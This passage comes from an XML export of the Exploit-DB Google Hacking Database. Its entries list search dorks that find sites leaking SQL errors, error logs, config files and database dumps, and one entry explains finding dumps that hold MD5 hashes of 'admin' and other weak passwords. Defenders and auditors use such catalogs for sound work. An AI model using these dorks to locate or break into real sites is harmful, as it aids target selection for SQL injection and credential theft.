<shortDescription>inurl:&quot;.php?id=&quot; &quot;You have an error in your SQL syntax&quot;</shortDescription>
<textualDescription>This dork allows us to find websites that are possibly vulnerable to sql injections
inurl:&quot;.php?id=&quot; &quot;You have an error in your SQL syntax&quot;
Drok3r</textualDescription>
<query>inurl:&quot;.php?id=&quot; &quot;You have an error in your SQL syntax&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;.php?id=&quot; &quot;You have an error in your SQL syntax&quot;</querystring>
<edb></edb>
<date>2017-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>5610</id>
<link>https://www.exploit-db.com/ghdb/5610</link>
<category>Error Messages</category>
<shortDescription>inurl:&quot;/errors/report.php&quot; intext:&quot;There has been an error processing your request&quot;</shortDescription>
<textualDescription>Error Pages:
inurl:&quot;/errors/report.php&quot; intext:&quot;There has been an error processing your request&quot;
site:*/errors/404.html
site:*/errors/error.html
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/errors/report.php&quot; intext:&quot;There has been an error processing your request&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/errors/report.php&quot; intext:&quot;There has been an error processing your request&quot;</querystring>
<edb></edb>
<date>2019-10-31</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5877</id>
<link>https://www.exploit-db.com/ghdb/5877</link>
<category>Error Messages</category>
<shortDescription>inurl:&quot;/WebResource.axd?d=&quot; AND intext:Error</shortDescription>
<textualDescription># Dork #
inurl:&quot;/WebResource.axd?d=&quot; AND intext:Error
Error Messages.
</textualDescription>
<query>inurl:&quot;/WebResource.axd?d=&quot; AND intext:Error</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/WebResource.axd?d=&quot; AND intext:Error</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>4255</id>
<link>https://www.exploit-db.com/ghdb/4255</link>
<category>Error Messages</category>
<shortDescription>inurl:&quot;id=&quot; &amp; intext:&quot;MySQL Error: 1064&quot; &amp; &quot;Session halted.&quot;</shortDescription>
<textualDescription>inurl:&quot;id=&quot; &amp; intext:&quot;MySQL Error: 1064&quot; &amp; &quot;Session halted.&quot;
Produces about 11,000 results.
Author: pHr0ZZy</textualDescription>
<query>inurl:&quot;id=&quot; &amp; intext:&quot;MySQL Error: 1064&quot; &amp; &quot;Session halted.&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;id=&quot; &amp; intext:&quot;MySQL Error: 1064&quot; &amp; &quot;Session halted.&quot;</querystring>
<edb></edb>
<date>2016-04-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>5881</id>
<link>https://www.exploit-db.com/ghdb/5881</link>
<category>Error Messages</category>
<shortDescription>inurl:&quot;index.php?id=&quot; intext:&quot;Warning: mysql_num_rows()&quot;</shortDescription>
<textualDescription>Author:Alperen Ergel
Date: 01/04/2020
Dork:inurl:&quot;index.php?id=&quot; intext:&quot;Warning: mysql_num_rows()&quot;
Description: potential SQL errors and injection</textualDescription>
<query>inurl:&quot;index.php?id=&quot; intext:&quot;Warning: mysql_num_rows()&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php?id=&quot; intext:&quot;Warning: mysql_num_rows()&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Alperen Ergel</author>
</entry>
<entry>
<id>3676</id>
<link>https://www.exploit-db.com/ghdb/3676</link>
<category>Error Messages</category>
<shortDescription>inurl:&quot;index.php?m=content+c=rss+catid=10&quot;</shortDescription>
<textualDescription>Author: eidelweiss http://host/index.php?m=content&amp;c=rss&amp;catid=5 show MySQL Error (table)
</textualDescription>
<query>inurl:&quot;index.php?m=content+c=rss+catid=10&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php?m=content+c=rss+catid=10&quot;</querystring>
<edb></edb>
<date>2011-01-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>5862</id>
<link>https://www.exploit-db.com/ghdb/5862</link>
<category>Error Messages</category>
<shortDescription>inurl:(&quot;/storage/logs/laravel.log&quot;) AND intext:(&quot;local.ERROR&quot; | &quot;NULL.ERROR&quot; | &quot;EMERGENCY:&quot;)</shortDescription>
<textualDescription># Dork #
inurl:(&quot;/storage/logs/laravel.log&quot;) AND intext:(&quot;local.ERROR&quot; |
&quot;NULL.ERROR&quot; | &quot;EMERGENCY:&quot;)
laravel Error log.
</textualDescription>
<query>inurl:(&quot;/storage/logs/laravel.log&quot;) AND intext:(&quot;local.ERROR&quot; | &quot;NULL.ERROR&quot; | &quot;EMERGENCY:&quot;)</query>
<querystring>https://www.google.com/search?q=inurl:(&quot;/storage/logs/laravel.log&quot;) AND intext:(&quot;local.ERROR&quot; | &quot;NULL.ERROR&quot; | &quot;EMERGENCY:&quot;)</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>4213</id>
<link>https://www.exploit-db.com/ghdb/4213</link>
<category>Error Messages</category>
<shortDescription>inurl:/console-selfservice/common/scripts/calendar/ipopeng.htm</shortDescription>
<textualDescription>RSA Self-Service Console &quot;Error&quot;
-Xploit </textualDescription>
<query>inurl:/console-selfservice/common/scripts/calendar/ipopeng.htm</query>
<querystring>https://www.google.com/search?q=inurl:/console-selfservice/common/scripts/calendar/ipopeng.htm</querystring>
<edb></edb>
<date>2016-03-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4194</id>
<link>https://www.exploit-db.com/ghdb/4194</link>
<category>Error Messages</category>
<shortDescription>inurl:/nesp/app</shortDescription>
<textualDescription>Novell Access Manager and NetIQ Access Manager
Error:NIDPMAIN (No ESP card defined)
-Xploit </textualDescription>
<query>inurl:/nesp/app</query>
<querystring>https://www.google.com/search?q=inurl:/nesp/app</querystring>
<edb></edb>
<date>2016-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>5146</id>
<link>https://www.exploit-db.com/ghdb/5146</link>
<category>Error Messages</category>
<shortDescription>inurl:/php-errors.log filetype:log</shortDescription>
<textualDescription>inurl:/php-errors.log filetype:log
</textualDescription>
<query>inurl:/php-errors.log filetype:log</query>
<querystring>https://www.google.com/search?q=inurl:/php-errors.log filetype:log</querystring>
<edb></edb>
<date>2019-03-11</date>
<author>Thalysson Sarmento</author>
</entry>
<entry>
<id>4179</id>
<link>https://www.exploit-db.com/ghdb/4179</link>
<category>Error Messages</category>
<shortDescription>inurl:/SAML2/SOAP/ | inurl:/SAML2/POST</shortDescription>
<textualDescription>Shibboleth Error XML
-Xploit
</textualDescription>
<query>inurl:/SAML2/SOAP/ | inurl:/SAML2/POST</query>
<querystring>https://www.google.com/search?q=inurl:/SAML2/SOAP/ | inurl:/SAML2/POST</querystring>
<edb></edb>
<date>2016-01-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4247</id>
<link>https://www.exploit-db.com/ghdb/4247</link>
<category>Error Messages</category>
<shortDescription>inurl:/siteminderagent/ | app:&quot;Error 404: java.io.FileNotFoundException: SRVE0190E: File not found: /siteminderagent/&quot;</shortDescription>
<textualDescription>CA Technologies CA Single Sign-On (CA SSO) Error's.
-Xploit</textualDescription>
<query>inurl:/siteminderagent/ | app:&quot;Error 404: java.io.FileNotFoundException: SRVE0190E: File not found: /siteminderagent/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/siteminderagent/ | app:&quot;Error 404: java.io.FileNotFoundException: SRVE0190E: File not found: /siteminderagent/&quot;</querystring>
<edb></edb>
<date>2016-03-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4246</id>
<link>https://www.exploit-db.com/ghdb/4246</link>
<category>Error Messages</category>
<shortDescription>inurl:/smpwservices.fcc | &quot;/lm_private/CkeSetter.aspx&quot;</shortDescription>
<textualDescription>CA Technologies CA Single Sign-On (CA SSO) Error's.
-Xploit
</textualDescription>
<query>inurl:/smpwservices.fcc | &quot;/lm_private/CkeSetter.aspx&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/smpwservices.fcc | &quot;/lm_private/CkeSetter.aspx&quot;</querystring>
<edb></edb>
<date>2016-03-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4144</id>
<link>https://www.exploit-db.com/ghdb/4144</link>
<category>Error Messages</category>
<shortDescription>inurl:/uniquesig0/ or inurl:/uniquesig0/InternalSite/</shortDescription>
<textualDescription>Microsoft Forefront Unified Access Gateway - Error Pages/Logins/LogOffMsg's
-Xploit </textualDescription>
<query>inurl:/uniquesig0/ or inurl:/uniquesig0/InternalSite/</query>
<querystring>https://www.google.com/search?q=inurl:/uniquesig0/ or inurl:/uniquesig0/InternalSite/</querystring>
<edb></edb>
<date>2015-12-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4790</id>
<link>https://www.exploit-db.com/ghdb/4790</link>
<category>Error Messages</category>
<shortDescription>inurl:?wp-commentsrss2.php -git</shortDescription>
<textualDescription>inurl:?wp-commentsrss2.php -git
This dork show result that contain wp-commentsrss2.php
ManhNho
</textualDescription>
<query>inurl:?wp-commentsrss2.php -git</query>
<querystring>https://www.google.com/search?q=inurl:?wp-commentsrss2.php -git</querystring>
<edb></edb>
<date>2018-04-25</date>
<author>ManhNho</author>
</entry>
<entry>
<id>3840</id>
<link>https://www.exploit-db.com/ghdb/3840</link>
<category>Error Messages</category>
<shortDescription>inurl:advsearch.php?module= &amp; intext:sql syntax</shortDescription>
<textualDescription>Exploit Title : SQLI Exploit
Google Dork : inurl:advsearch.php?module= &amp; intext:sql syntax
Date : 19/3/2013
Exploit Author : Scott Sturrock
Email : f00bar'at'linuxmail'dot'org</textualDescription>
<query>inurl:advsearch.php?module= &amp; intext:sql syntax</query>
<querystring>https://www.google.com/search?q=inurl:advsearch.php?module= &amp; intext:sql syntax</querystring>
<edb></edb>
<date>2013-04-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>5643</id>
<link>https://www.exploit-db.com/ghdb/5643</link>
<category>Error Messages</category>
<shortDescription>inurl:elmah.axd ext:axd</shortDescription>
<textualDescription># Google Dork : inurl:elmah.axd ext:axd
# Category : Files Containing Juicy Info
# Date : 11-11-2019
# Author : Dhaiwat Mehta
</textualDescription>
<query>inurl:elmah.axd ext:axd</query>
<querystring>https://www.google.com/search?q=inurl:elmah.axd ext:axd</querystring>
<edb></edb>
<date>2019-11-11</date>
<author>Dhaiwat Mehta</author>
</entry>
<entry>
<id>4318</id>
<link>https://www.exploit-db.com/ghdb/4318</link>
<category>Error Messages</category>
<shortDescription>inurl:index of driver.php?id=</shortDescription>
<textualDescription># Exploit Title: Google dork to discover OS warnings
# Google Dork:inurl:index of driver.php?id=
# Exploit Author: @R0d3ntSquad
Simple dork to reveal websites with a huge amount of errors</textualDescription>
<query>inurl:index of driver.php?id=</query>
<querystring>https://www.google.com/search?q=inurl:index of driver.php?id=</querystring>
<edb></edb>
<date>2016-08-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>4137</id>
<link>https://www.exploit-db.com/ghdb/4137</link>
<category>Error Messages</category>
<shortDescription>inurl:index.php?id= intext:&quot;mysql_fetch_array&quot;</shortDescription>
<textualDescription>here's a dork to find sql injectable sites in general.
inurl can be replaced to something different...
thx,
Denis Muhic</textualDescription>
<query>inurl:index.php?id= intext:&quot;mysql_fetch_array&quot;</query>
<querystring>https://www.google.com/search?q=inurl:index.php?id= intext:&quot;mysql_fetch_array&quot;</querystring>
<edb></edb>
<date>2015-11-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>29</id>
<link>https://www.exploit-db.com/ghdb/29</link>
<category>Error Messages</category>
<shortDescription>MYSQL error message: supplied argument....</shortDescription>
<textualDescription>One of many potential error messages that spew interesting information. The results of this message give you real path names inside the webserver as well as more php scripts for potential &quot;crawling&quot; activities.</textualDescription>
<query>&quot;supplied argument is not a valid MySQL result resource&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22supplied+argument+is+not+a+valid+MySQL+result+resource%22</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>78</id>
<link>https://www.exploit-db.com/ghdb/78</link>
<category>Error Messages</category>
<shortDescription>mysql error with query</shortDescription>
<textualDescription>Another error message, this appears when an SQL query bails. This is a generic mySQL message, so there's all sort of information hackers can use, depending on the actual error message...</textualDescription>
<query>&quot;mySQL error with query&quot;</query>
<querystring>https://www.google.com/search?q=%22mySQL+error+with+query%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>935</id>
<link>https://www.exploit-db.com/ghdb/935</link>
<category>Error Messages</category>
<shortDescription>Netscape Application Server Error page</shortDescription>
<textualDescription>This error message highlights potentially unpatched or misconfigured Netscape Application Server or iPlanet application servers. An inquisitive mind would probably want to manually alter the URL's returned by this query, just to see what other, more informative messages might be revealed. As these servers are already exhibiting a misconfiguration, this could lead to other vulnerabilities being discovered.Finally, these servers are running software that is a few years old now. An attacker may feel that because of this, there's a strong possibility that they're not patched-up fully either, making them potentially vulnerable to known exploits.</textualDescription>
<query>intitle:&quot;404 SC_NOT_FOUND&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22404+SC_NOT_FOUND%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-04-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>57</id>
<link>https://www.exploit-db.com/ghdb/57</link>
<category>Error Messages</category>
<shortDescription>ORA-00921: unexpected end of SQL command</shortDescription>
<textualDescription>Another SQL error message from Cesar. This one coughs up full web pathnames and/or php filenames.</textualDescription>
<query>&quot;ORA-00921: unexpected end of SQL command&quot;</query>
<querystring>https://www.google.com/search?q=%22ORA-00921%3A+unexpected+end+of+SQL+command%22</querystring>
<edb></edb>
<date>2004-01-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>82</id>
<link>https://www.exploit-db.com/ghdb/82</link>
<category>Error Messages</category>
<shortDescription>ORA-00921: unexpected end of SQL command</shortDescription>
<textualDescription>Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;ORA-00921: unexpected end of SQL command&quot;</query>
<querystring>https://www.google.com/search?q=%22ORA%2D00921%3A+unexpected+end+of+SQL+command%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>81</id>
<link>https://www.exploit-db.com/ghdb/81</link>
<category>Error Messages</category>
<shortDescription>ORA-00936: missing expression</shortDescription>
<textualDescription>A generic ORACLE error message, this message can display path names, function names, filenames and partial database code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;ORA-00936: missing expression&quot;</query>
<querystring>https://www.google.com/search?q=%22ORA%2D00936%3A+missing+expression%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>331</id>
<link>https://www.exploit-db.com/ghdb/331</link>
<category>Error Messages</category>
<shortDescription>PHP application warnings failing &quot;include_path&quot;</shortDescription>
<textualDescription>These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths.PS: thanks to fr0zen for correcting the google link for this dork (murfie, 24 jan 2006).</textualDescription>
<query>PHP application warnings failing &quot;include_path&quot;</query>
<querystring>https://www.google.com/search?q=PHP+application+warnings+failing+%22include_path%22</querystring>
<edb></edb>
<date>2004-07-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>5528</id>
<link>https://www.exploit-db.com/ghdb/5528</link>
<category>Error Messages</category>
<shortDescription>site:*/404/404.html intitle:&quot;404&quot;</shortDescription>
<textualDescription>Error 404 page:
site:*/404/404.html intitle:&quot;404&quot;
site:*/503.html intitle:&quot;503&quot; intext:&quot;Service Unavailable&quot;
site:*/403.html intitle:&quot;403 Forbidden&quot;
site:*/404.html intitle:&quot;404 Not Found&quot;
inurl:&quot;/index.php/error-404&quot; intitle:&quot;Error 404&quot;
site:*/index.php/*/error-404 intitle:&quot;Error 404&quot;
site:*/500.* intitle:&quot;500 Internal Server Error&quot; intext:&quot;Internal Server Error&quot;
intitle:&quot;IIS 8.0 Detailed Error - 404.0 - Not Found&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/404/404.html intitle:&quot;404&quot;</query>
<querystring>https://www.google.com/search?q=site:*/404/404.html intitle:&quot;404&quot;</querystring>
<edb></edb>
<date>2019-09-13</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5560</id>
<link>https://www.exploit-db.com/ghdb/5560</link>
<category>Error Messages</category>
<shortDescription>site:*/cgi-sys/defaultwebpage.cgi intext:&quot;SORRY!&quot;</shortDescription>
<textualDescription>Error Pages:
site:*/cgi-sys/defaultwebpage.cgi intext:&quot;SORRY!&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/cgi-sys/defaultwebpage.cgi intext:&quot;SORRY!&quot;</query>
<querystring>https://www.google.com/search?q=site:*/cgi-sys/defaultwebpage.cgi intext:&quot;SORRY!&quot;</querystring>
<edb></edb>
<date>2019-09-30</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5553</id>
<link>https://www.exploit-db.com/ghdb/5553</link>
<category>Error Messages</category>
<shortDescription>site:*/cgi-sys/suspendedpage.cgi intitle:&quot;Account Suspended&quot;</shortDescription>
<textualDescription>Error Pages:
site:*/cgi-sys/suspendedpage.cgi intitle:&quot;Account Suspended&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/cgi-sys/suspendedpage.cgi intitle:&quot;Account Suspended&quot;</query>
<querystring>https://www.google.com/search?q=site:*/cgi-sys/suspendedpage.cgi intitle:&quot;Account Suspended&quot;</querystring>
<edb></edb>
<date>2019-09-25</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5530</id>
<link>https://www.exploit-db.com/ghdb/5530</link>
<category>Error Messages</category>
<shortDescription>site:*/Shibboleth.sso/SAML2/POST</shortDescription>
<textualDescription>Error Page:
site:*/Shibboleth.sso/SAML2/POST
Reza Abasi(Turku)
</textualDescription>
<query>site:*/Shibboleth.sso/SAML2/POST</query>
<querystring>https://www.google.com/search?q=site:*/Shibboleth.sso/SAML2/POST</querystring>
<edb></edb>
<date>2019-09-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5565</id>
<link>https://www.exploit-db.com/ghdb/5565</link>
<category>Error Messages</category>
<shortDescription>site:*/wp-admin/maint/repair.php intext:&quot;define(WP_ALLOW_REPAIR,true);&quot;</shortDescription>
<textualDescription>Error Pages:
site:*/wp-admin/maint/repair.php intext:&quot;define(WP_ALLOW_REPAIR,true);&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/wp-admin/maint/repair.php intext:&quot;define(WP_ALLOW_REPAIR,true);&quot;</query>
<querystring>https://www.google.com/search?q=site:*/wp-admin/maint/repair.php intext:&quot;define(WP_ALLOW_REPAIR,true);&quot;</querystring>
<edb></edb>
<date>2019-10-07</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5564</id>
<link>https://www.exploit-db.com/ghdb/5564</link>
<category>Error Messages</category>
<shortDescription>site:*/wp-includes/Requests/php_errorlog</shortDescription>
<textualDescription>Error Pages:
site:*/wp-includes/Requests/php_errorlog
site:*/wp-includes/Requests/Hooks.php intext:&quot;Fatal error:Interface&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/wp-includes/Requests/php_errorlog</query>
<querystring>https://www.google.com/search?q=site:*/wp-includes/Requests/php_errorlog</querystring>
<edb></edb>
<date>2019-10-04</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5176</id>
<link>https://www.exploit-db.com/ghdb/5176</link>
<category>Error Messages</category>
<shortDescription>site:com inurl:jboss filetype:log -github.com</shortDescription>
<textualDescription>Dork : site:com inurl:jboss filetype:log -github.com
Description : this dork gives you jboss error logs.
Author : botsec0
</textualDescription>
<query>site:com inurl:jboss filetype:log -github.com</query>
<querystring>https://www.google.com/search?q=site:com inurl:jboss filetype:log -github.com</querystring>
<edb></edb>
<date>2019-04-10</date>
<author>botsec0</author>
</entry>
<entry>
<id>59</id>
<link>https://www.exploit-db.com/ghdb/59</link>
<category>Error Messages</category>
<shortDescription>sitebuildercontent</shortDescription>
<textualDescription>This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?</textualDescription>
<query>inurl:sitebuildercontent</query>
<querystring>https://www.google.com/search?q=inurl:sitebuildercontent&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>60</id>
<link>https://www.exploit-db.com/ghdb/60</link>
<category>Error Messages</category>
<shortDescription>sitebuilderfiles</shortDescription>
<textualDescription>This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?</textualDescription>
<query>inurl:sitebuilderfiles</query>
<querystring>https://www.google.com/search?q=inurl:sitebuilderfiles&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>61</id>
<link>https://www.exploit-db.com/ghdb/61</link>
<category>Error Messages</category>
<shortDescription>sitebuilderpictures</shortDescription>
<textualDescription>This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?</textualDescription>
<query>inurl:sitebuilderpictures</query>
<querystring>https://www.google.com/search?q=inurl:sitebuilderpictures&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>460</id>
<link>https://www.exploit-db.com/ghdb/460</link>
<category>Error Messages</category>
<shortDescription>snitz! forums db path error</shortDescription>
<textualDescription>snitz forums uses a microsoft access databases for storage and the default name is &quot;Snitz_forums_2000.mdb&quot;. The installation recommends changing both the name and the path. If only one is changed this database error occurs. An attacker may use this information as a hint to the location and the changed name for the database, thus rendering the forum vulnerable to hostile downloads.</textualDescription>
<query>databasetype. Code : 80004005. Error Description :</query>
<querystring>https://www.google.com/search?q=databasetype.+Code+:+80004005.+Error+Description+:&amp;num=100&amp;safe=off&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2004-09-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>79</id>
<link>https://www.exploit-db.com/ghdb/79</link>
<category>Error Messages</category>
<shortDescription>sQL syntax error</shortDescription>
<textualDescription>Another generic SQL message, this message can display path names and partial SQL code, both of which are very helpful for hackers...</textualDescription>
<query>&quot;You have an error in your SQL syntax near&quot;</query>
<querystring>https://www.google.com/search?q=%22You+have+an+error+in+your+SQL+syntax+near%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>88</id>
<link>https://www.exploit-db.com/ghdb/88</link>
<category>Error Messages</category>
<shortDescription>supplied argument is not a valid PostgreSQL result</shortDescription>
<textualDescription>An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;Supplied argument is not a valid PostgreSQL result&quot;</query>
<querystring>https://www.google.com/search?q=%22Supplied+argument+is+not+a+valid+PostgreSQL+result%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>135</id>
<link>https://www.exploit-db.com/ghdb/135</link>
<category>Error Messages</category>
<shortDescription>warning &quot;error on line&quot; php sablotron</shortDescription>
<textualDescription>sablotron is an XML toolit thingie. This query hones in on error messages generated by this toolkit. These error messages reveal all sorts of interesting stuff such as source code snippets, path and filename info, etc.</textualDescription>
<query>warning &quot;error on line&quot; php sablotron</query>
<querystring>https://www.google.com/search?safe=off&amp;q=warning+%22error+on+line%22+php+sablotron</querystring>
<edb></edb>
<date>2004-03-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>67</id>
<link>https://www.exploit-db.com/ghdb/67</link>
<category>Error Messages</category>
<shortDescription>Windows 2000 web server error messages</shortDescription>
<textualDescription>Windows 2000 web servers. Aging, fairly easy to hack, especially out of the box...</textualDescription>
<query>intitle:&quot;the page cannot be found&quot; &quot;2004 microsoft corporation&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22the+page+cannot+be+found%22+%222004+microsoft+corporation%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>4453</id>
<link>https://www.exploit-db.com/ghdb/4453</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;# AdwCleaner&quot; ext:txt</shortDescription>
<textualDescription>Finds AdwCleaner logfiles
Dxtroyer</textualDescription>
<query>&quot;# AdwCleaner&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;# AdwCleaner&quot; ext:txt</querystring>
<edb></edb>
<date>2017-05-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>5810</id>
<link>https://www.exploit-db.com/ghdb/5810</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;# Kickstart&quot; filetype:cfg</shortDescription>
<textualDescription># Google Dork: # Kickstart filetype:cfg
# By using this dork, kickstart configuration files that contain
interesting information and root passwords (hashed) can be found.
# Date: 19/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;# Kickstart&quot; filetype:cfg</query>
<querystring>https://www.google.com/search?q=&quot;# Kickstart&quot; filetype:cfg</querystring>
<edb></edb>
<date>2020-03-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4429</id>
<link>https://www.exploit-db.com/ghdb/4429</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;# This file was generated by libcurl! Edit at your own risk.&quot; ext:txt</shortDescription>
<textualDescription>Finds leftover cookie data, sometimes containing vulnerable information
(often encrypted)
Dxtroyer</textualDescription>
<query>&quot;# This file was generated by libcurl! Edit at your own risk.&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;# This file was generated by libcurl! Edit at your own risk.&quot; ext:txt</querystring>
<edb></edb>
<date>2017-04-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>151</id>
<link>https://www.exploit-db.com/ghdb/151</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;#mysql dump&quot; filetype:sql</shortDescription>
<textualDescription>This reveals mySQL database dumps. These database dumps list the structure and content of databases, which can reveal many different types of sensitive information.</textualDescription>
<query>&quot;#mysql dump&quot; filetype:sql</query>
<querystring>https://www.google.com/search?q=%22%23mysql+dump%22+filetype%3Asql</querystring>
<edb></edb>
<date>2004-04-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>895</id>
<link>https://www.exploit-db.com/ghdb/895</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;#mysql dump&quot; filetype:sql 21232f297a57a5a743894a0e4a801fc3</shortDescription>
<textualDescription>this is a mod of one of the previous queries posted in here. the basic thing is, to add this:21232f297a57a5a743894a0e4a801fc3to your query, that oryginally results in a username lists with a MD5 encrypted password.this one finds mysql dumps with for a users who's passwordsare &quot;admin&quot; :)the &quot;21232f297a57a5a743894a0e4a801fc3&quot; is md5 result for &quot;admin&quot;you can try it with other queris on this site.use also:63a9f0ea7bb98050796b649e85481845 for root098f6bcd4621d373cade4e832627b4f6 for test3c3662bcb661d6de679c636744c66b62 for sexf561aaf6ef0bf14d4208bb46a4ccb3ad for xxxif you'll get lucky, you'll get a username, and a encryoted password, witch is the one above that u used.remember, that this works for all files that contain plaintex username and md5 encrypted passwords. use this techniq with other queris that you'll find hereuff... i hope i made my self clear.</textualDescription>
<query>&quot;#mysql dump&quot; filetype:sql 21232f297a57a5a743894a0e4a801fc3</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22%23mysql+dump%22+filetype%3Asql+21232f297a57a5a743894a0e4a801fc3</querystring>
<edb></edb>
<date>2005-02-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>4439</id>
<link>https://www.exploit-db.com/ghdb/4439</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;%@&quot; ext:ascx</shortDescription>
<textualDescription>Finds ASP configs and settings
Dxtroyer</textualDescription>
<query>&quot;%@&quot; ext:ascx</query>
<querystring>https://www.google.com/search?q=&quot;%@&quot; ext:ascx</querystring>
<edb></edb>
<date>2017-04-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>6644</id>
<link>https://www.exploit-db.com/ghdb/6644</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;* Authentication Unique Keys and Salts&quot; ext:txt | ext:log</shortDescription>
<textualDescription># Google Dork: &quot;* Authentication Unique Keys and Salts&quot; ext:txt | ext:log
# Authentication Unique Keys and Salts and more....
# Date: 2/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;* Authentication Unique Keys and Salts&quot; ext:txt | ext:log</query>
<querystring>https://www.google.com/search?q=&quot;* Authentication Unique Keys and Salts&quot; ext:txt | ext:log</querystring>
<edb></edb>
<date>2020-10-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4571</id>
<link>https://www.exploit-db.com/ghdb/4571</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;-- Account dump&quot; ext:sql -git</shortDescription>
<textualDescription>Desc of Dork: Find juicy information on MySQL Dumps with the tag
&quot;Account&quot;.
- SeekedNow</textualDescription>
<query>&quot;-- Account dump&quot; ext:sql -git</query>
<querystring>https://www.google.com/search?q=&quot;-- Account dump&quot; ext:sql -git</querystring>
<edb></edb>
<date>2017-08-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>4617</id>
<link>https://www.exploit-db.com/ghdb/4617</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;-- Dumping data for table&quot; ext:sql</shortDescription>
<textualDescription>This dork will return database backups.
By: A1anoud Altoraif.
</textualDescription>
<query>&quot;-- Dumping data for table&quot; ext:sql</query>
<querystring>https://www.google.com/search?q=&quot;-- Dumping data for table&quot; ext:sql</querystring>
<edb></edb>
<date>2017-11-20</date>
<author>A1anoud Altoraif</author>
</entry>
<entry>
